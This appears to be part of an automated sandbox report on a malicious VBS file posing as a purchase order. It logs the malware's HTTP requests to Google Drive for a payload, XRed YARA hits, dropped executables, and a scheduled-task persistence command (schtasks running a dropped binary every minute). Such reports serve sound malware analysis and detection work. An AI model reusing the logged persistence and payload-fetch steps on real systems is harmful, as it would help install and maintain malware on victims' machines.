                                                                                                                                                                            2024-12-30 10:49:57 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6SUhPWWbAXX2Ngyxkqp9LCxsyg0zxCvAbw1wU_6MK4aUdL1C_3d0dH2nCeOblQMN0nQD9XPG0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-08ocrlm4UfArBFAwF3sPvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:57 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:57 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 49 58 59 33 53 36 68 69 65 63 7a 38 64 38 33 50 67 39 75 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="wIXY3S6hiecz8d83Pg9u5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:57 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            140192.168.2.849917142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:57 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6mH94JekuDTn1UfEbwtYFPpFcJizbuLapc1Fm63fNpcrcESeov6U-LNd4b_socvB_S
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZyUy83hu9PffS63YEdemgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:57 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:57 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 5f 59 39 78 2d 58 67 33 57 4c 38 68 4b 51 48 6c 66 64 32 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="K_Y9x-Xg3WL8hKQHlfd2UA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:57 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            141192.168.2.849916142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JUdFOoxT8vvMscOBzjSJeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:05:48:34
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                                                                                                                                                                            Imagebase:0x7ff723660000
                                                                                                                                                                            File size:170'496 bytes
                                                                                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1489527572.000001C7E5148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:05:48:42
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:2'208'256 bytes
                                                                                                                                                                            MD5 hash:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:05:48:42
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0x4b0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:05:48:44
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                                                                                            Imagebase:0xa40000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:53'161'064 bytes
                                                                                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                                                                                                                                                                            Imagebase:0x300000
                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2719329795.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2719329795.0000000002B88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:12
                                                                                                                                                                            Start time:05:48:46
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                            File size:187'904 bytes
                                                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:05:48:48
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:05:48:52
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:05:48:58
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                                                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:22
                                                                                                                                                                            Start time:05:49:01
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:23
                                                                                                                                                                            Start time:05:49:01
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:05:49:06
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360
                                                                                                                                                                            Imagebase:0x3a0000
